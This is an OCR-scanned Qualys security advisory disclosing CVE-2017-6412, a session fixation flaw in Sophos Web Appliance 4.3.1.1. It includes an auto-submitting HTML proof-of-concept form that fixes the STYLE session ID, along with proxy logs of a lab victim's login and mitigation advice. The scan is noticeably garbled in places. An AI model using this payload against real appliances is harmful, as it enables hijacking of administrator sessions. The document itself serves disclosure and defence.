Qualys Security Advisory QSA-2017-02-28 


February 28, 2017 


Session Fixation Vulnerability in Sophos Secure Web Appliance 


SYNOPSIS: 


Sophos Secure Web Appliance (Hardware and/or Virtual) v4.3.1.1 does not invalidate pre-login Session IDs 
and accepts any random Session IDs provided by users/attackers which allows sessions to be fixed. 


Reference:- https://www.sophos.com/en-us/products/secure-web-gateway.aspx 


CVE: http://cve.mitre.org/cgi-bin/cvename.cgi ?name=CVE-2017-6412 


VULNERABILITY DETAILS: 
Lab Setup: 


1. Target: Sophos Web Appliance 
2. Target IP Address: 192.168.253.147 
3. Site Hosting Malicious Session Fixation Page:  http//MaliciousKali.com 


Vulnerable/Tested Version: 


Sophos Web Appliance version 4.3.1.1 is affected. Older versions may also be affected. 


Sophos Web Appliance running latest version: 
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Vulnerability: Session Fixation Vulnerability 


An unauthenticated, remote attacker could host a malicious page on his website that makes POST request to 
the victim’s Sophos Web Appliance to set the Session ID using STYLE parameter. The appliance does not 
validate if the Session ID sent by user/browser was issued by itself or fixed by user/attacker. 


Also, the appliance does not invalidate pre-login Session IDs it issued earlier once user logs in successfully. 
It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one. 


Risk Factor: High 


Impact: 


If victim visits a malicious website that sends POST request with fixed Session ID of attacker’s choosing to the 
Sophos Web Appliance, the victim ends up logging in to the appliance’s web management console with the 
same Session ID. An attacker can then use same Session ID to hijack victim’s session and would have full 
control over the appliance if victim has administrative privileges. 


CVSS Score: AV: N/AC: M/AU: S/C:C/I: C/A:C 


Proof-Of-Concept: 


1. Host a webpage on malicious site that sends a POST request with a fixed Session ID in STYLE 
parameter to the Sophos Web Appliance. 


http//maliciouskali.com/Sophos- Fixation. html 


Sophos-Fixation.html 


/var/www/html 
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<html> 
<body> 
<form name="Sophos Login"action="https://192.168.253.147/index.php?c=login" method="POST" > 
<input type="hidden" name="STYLE" vo] ve="@130b220214703°47039¢49e345 2027] > 
</form> 
<script> 
window.onload = function(){ 
document. forms[ ‘Sophos Login'].submit() 
</script> 
</body> 
</html> 


Note: The Session ID highlighted was obtained as an unauthenticated user and I then changed its last 
letter from a to b 


Victim visits the malicious page _http://maliciouskali.com/Sophos-Fixation. htm] 


# | Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title 
72 https://192.168.253.147 POST _ /index.php?c=login id) O 200 4870 HTML php Sophos \ 
75 https://192.168.253.147 GET /2667300/resources/javascripts/... O O 200 140997 script js 
7 https://192.168.253.147 GET /2667300/resources/javascripts/... B O 200 1537 script js 
78 https://192.168.253.147 GET /2667300/resources/javascripts/... B O 200 32470 script js 
82 https://192.168.253.147 POST /index.php?c=login w O 200 42085 HTML php Sophos \ 
86 https://192.168.253.147 GET /2667300/resources/javascripts/... O O 200 675084 script js 
87 https://192.168.253.147 GET /2667300/resources/javascripts/.... O O 200 35983 script js 
99 https://192.168.253.147 POST /index.php?c=dashboard O 200 542 JSON php 
100 = https://192.168.253.147 POST _ /index.php?c=dashboard O 200 1357 JSON php 
a 
Request ji apasal 


[ Raw | Headers | Hex HTML | Render 


HTTP/1.1 200 OK 

Date: Tue, 28 Feb 2017 15:20:39 GMT 

Server: Apache/2.4.23 (Debian) 
Last-Modified: Tue, 28 Feb 2017 15:20:01 GMT 
ETag: "135-54998bac71b50-gzip" 
Accept-Ranges: bytes 

Vary: Accept-Encoding 

Content-Length: 309 

Connection: close 

Content-Type: text/html 


<html> 
<body> 
<form name="Sophos Login"action="https://192.168.253.147/index.php?c=login"” method="POST" > 
<input type="hidden" name="STYLE" value="0130b2202 Ld7b3 £4£039c49e345ad27b"> 
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Note: For demonstration purpose, the malicious page sets the Session ID and redirects victim to the 
appliances login page. However, a malicious attacker can use different trick. Also, note that the victim’s 
browser cache was cleared to make sure that the results are not from past logins. 


3. 


Victim logs into the appliance with admin privileges. 


Intercept i: WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


# a|Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title | Comment [sst |IP K 
714  http://maliciouskali.com GET /Sophos-Fixation.html [F] ( 200 585 HTML html © 192.168.253.130 
75 https://192.168.253.147 GET —/2667300/resourcesj/javascripts/.. (J G 20 140997 script js @ 192.168.253.147 
T77 https://192.168.253.147 GET /2667300/resources/javascripts/... O 200 1537 script js @ 192.168.253.147 
78  https://192.168.253.147 GET —/2667300/resources/javascripts/.. (J (J 200 = 32470 script is @ 192.168.253.147 
82  https://192.168.253.147 POST /index.php?c=login w © 200 42085 HTML php Sophos Web Applia... @ 192.168.253.147 
86  https://192.168.253.147 GET — /2667300/resources/javascripts/.. (J [J 200 675084 script js @) 192.168.253.147 
87 _https://192.168.253.147 GET — /2667300/resourcesjjavascripts/.. ( 200 35983 script js @ 192.168.253.147 
99  https://192.168.253.147 POST /index.php?c=dashboard A O 200 542 JSON php @ 192.168.253.147 
100  https://192.168.253.147 POST /index.php?c=dashboard w © 200 1357 JSON php @ 192.168.253.147 


(Request | Response 
| Raw | Params Headers | Hex 


POST /index.php?c=login HTTP/1.1 

Host: 192.168.253.147 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate, br 

Referer: http://maliciouskali.com/Sophos-Fixation.html 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www-form-ur lencoded 

Content-Length: 38 


STYLE=0130b2202 1473 #4#0359e49e3 45ad27b 


The same Session ID was sent to the appliance. 


Appliance logs the victim in with same Session ID that was fixed by the attacker. 


Filter: Hiding CSS, image and general binary content 


|# _4| Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title | Comment | SSL |R | Cookies 

71 http://maliciouskalicom GET —/Sophos-Fixation. htm e O 200 585 HTML html © 192.168.253.130 “ 
72 https://192.168.253.147 POST _/index.php?c=login w ( 200 4870 HTML php Sophos Web Applia... 192.168.253.147 

75 —https://192.168.253.147 GET —/2667300/resources/javascripts/).. (C [J 200 = 140997 script js Œ 192.168.253.147 

77 https://192.168.253.147 GET /2667300/resources/javascripts/... (J J 200 14537 scpt js 192.168.253.147 

78  https://192.168.253.147 GET /2667300/resources/javascripts/... C © 200 32470 script js @ 192.168.253.147 

86 https://192.168.253.147 GET /2667300/resources/javascripts/... =) O 200 675084 script js M 192.168.253.147 

87 https://192.168.253.147 GET = —/2667300/resources/javascripts/.. [J 200 35983 script js @ 192.168.253.147 

99 https://192.168.253.147 POST __/index php?c=dashboard w © 200 542 JSON php @ 192.168.253.147 

100 __https://192.168.253.147 POST _/index.php?c=dashboard w 200 1357 JSON php @ 192.168.253.147 ’ 
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| Raw | Headers Hex | HTML | Render 


PM\" ,\"cma\": {\"joined\" :false,\"host\":\"\",\"is_cma\":false,\"swa_joined\":false,\"is_vm\":true},\"locale\":\"en\",\"trialMode\":true,\"licenseDaysLeft\" :29,\"navig 
ation\":[],\"navigation left\":[],\"status_ no threat_list\":\"Threat list 
unavailable\" ,\"status_system_ok\":\"0K\",\"status_system_caution\":\"Warning\",\"status_system_error\":\"Error\",\"status_system_unknown\" :\"Unknown\" ,\"uiStatusMess 
ages\":{\"status no threat_list\":\"Threat list 
unavailable\" ,\"status_system_ok\":\"0K\",\"status_system_caution\":\"Warning\" ,\"status_system_error\":\"Error\",\"status_system_unknown\" :\"Unknown\"},\"rba\":{\"re 
ports\":true,\"search\":true,\"configuration\":true,\"system_status\":true,\"help support\":true,\"editable\":true,\"current_user\":\"admin\" ,\"globalUser\":false,\"a 
dmin_role\":true}}"}); 

args.set('WSA_BUILD', 2667300) ; 

args set('SIDT, ' STYLE-0130b22021a7BIEAC099649e945aa27H' ) ; 

args.set('remoteMon', 'no'); 

args.set('remoteEnabled', 'no'); 


Sophos .widget .CleanCssButtons() ; 
fa 13> *f 
</script> 
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Filter: Hiding CSS, image and general binary content (2) 

# 4) Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title | Comment | SSL [iP | Cookies 

71 http://maliciouskali.com GET /Sophos-Fixation.html 200 585 HTML html O 192.168.253.130 

72 https://192.168.253.147 POST = /index.php?c=login o 200 4870 HTML php Sophos Web Applia... @) 192.168.253.147 
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77 https://192.168.253.147 GET = /2667300/resources/javascripts/... o O 200 1537 script js 192.168.253.147 

78 https://192.168.253.147 GET /2667300/resources/javascripts/... o O 200 32470 script js @) 192.168.253.147 

82  https://192.168.253.147 POST /index.php?c=login (J 200 42085 HTML php Sophos Web Applia... 192.168.253.147 
https://192.168.253.147 /2667300/resources/javascripts/... O 200 675084 script js @) 192.168.253.147 
https://192.168.253.147 12667300/resources/javascripts/.. s 200 35983 script js 192.168.253.147 

100 — https://192.168.253.147 findex.php?c=dashboard JSON 192.168.253.147 
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POST /index.php?c=dashboard HTTP/1.1 a 
Host: 192.168.253.147 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 
Accept: */* 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate, br 

X-Requested-With: XMLHttpRequest 

Content-Type: application/x-www-form-ur lencoded 

Referer: https://192.168.253.147/index.php?c=login 

Content-Length: 51 

Connection: close 


act ion=clockéSTYLE=0130b2202 1a 753#4#0396492945Ad2 75 
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Intercept 


Filter: Hiding CSS, image and general binary content (2) 


# 4) Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title | Comment | SSL | IP | Cookies 


https://192.168.253.147 /2667300/resources/javascripts/.. 
269 https://192.168.253.147 POST _ /index.php?c=dashboard 


Raw | Headers | Hex | HTML | Render | 
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Configuration 
The configuration homepage provides links to common post-installation procedures. Use the list below to access these configuration steps. 
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249  https://192.168.253.147 POST /index.php?c=dashboard O 200 542 JSON php W) 192.168.253.147 
250  https://192.168.253.147 POST /index.php?c=dashboard v © 200 1357. JSON php 192.168.253.147 
251  https://192.168.253.147 POST /index.php?c=dashboard O 200 1357 JSON php @ 192.168.253.147 
252 https://192.168.253.147 POST /index.php?c=dashboard O 200 1357 JSON php @ = 192.168.253.147 
253  https://192.168.253.147 POST /index.php?c=dashboard G 200 1357 JSON php 192.168.253.147 
https://192.168.253.147 POST _ /index.php?c=dashboard v &) 200 1357 JSON php 192.168.253.147 

B 

w 


RR 


An attacker can use the same Session ID to hijack victim’s session. 


Potential Mitigation: 


It is recommended to discard/nvalidate pre-login Session IDs as soon as user logs in and issue him a new 
Session ID. Also, check for fixed Session IDs that application never issued to any user. 


OWASP Recommendation: https://www.owasp.org/index.php/Session Fixation Protection 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research@ qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


